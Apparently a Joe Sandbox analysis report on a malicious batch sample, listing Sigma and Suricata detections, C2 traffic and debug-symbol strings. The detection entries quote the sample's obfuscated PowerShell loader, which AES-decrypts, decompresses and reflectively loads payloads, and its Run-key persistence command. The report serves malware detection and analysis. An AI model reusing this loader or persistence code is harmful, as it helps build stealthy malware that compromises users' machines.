Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzx
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYU
Sigma detected: Potential WinAPI Calls Via CommandLine
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$YOhLAkBIOfDYU
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7088, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 3804, ProcessName: schtasks.exe
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzx
Sigma detected: Powerup Write Hijack DLL
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6444, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6444, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Sigma detected: Suspicious Powershell In Registry Run Keys
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 6400, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6824, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 6444, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-03T14:54:46.061887+020020355951Domain Observed Used for C2 Detected154.216.20.1326969192.168.2.659172TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
Source: unknownHTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.6:59173 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbSystem.DirectoryServices.dll source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.ServiceProcess.pdbp}Y source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
